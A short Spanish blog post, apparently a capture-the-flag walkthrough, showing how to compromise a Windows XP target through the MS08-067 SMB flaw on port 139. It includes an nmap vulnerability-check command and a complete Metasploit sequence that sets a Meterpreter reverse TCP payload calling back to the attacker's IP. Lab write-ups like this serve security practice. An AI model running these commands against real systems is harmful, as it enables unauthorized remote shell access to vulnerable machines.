WINDOWS XP PRO

Últimamente ando desaparecido por practicar algunos CTF con unos chicos de EKOSPACE donde me agrada jugar en grupo y no solo.


Intentemos leer mi anterior post Aquí Entonces el CTF nos da solo 90min para pensar romper el servidor obviamente estará tapado la IP o alguna URL del CTF. Este método cambia porque es vulnerable y que nuestro puerto 445 esta tapado.

 Entonces solo tenemos 139 pero nosotros sabemos que si usamos NESSUS podemos confirmar la vulnerabilidad y si aun estas dudoso lo vamos a comprobar. Recuerda este comando puede a llegar a bloquear el exploit entonces te recomiendo si lo usas, resetear el servidor del CTF o esperar que se desbloquee.
nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 IP
 

Bueno en unos de los puertos vulnerable seria el 139, entonces vamos a explotar con todos los datos confirmado.
msfconsole -q
use exploit/windows/smb/ms08_067_netapi
set RHOST TARGET_IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
Recuerda colocar tu ip publica, ejemplo la ip de tu router
set target 4
set RPORT 139
set SMBDirect false
Esto de arriba es importante porque si el puerto 445 (SMB) está cerrado, a veces puede aprovechar esta vulnerabilidad a través del puerto 139 (NetBios). En metasploit, simplemente use la siguiente sintaxis.
exploit
Ahora intentemos abrir nuestro puerto desde nuestro router, recuerda sino entendiste como saque los comandos puedes visitar mi post anterior.



Comments

Popular Posts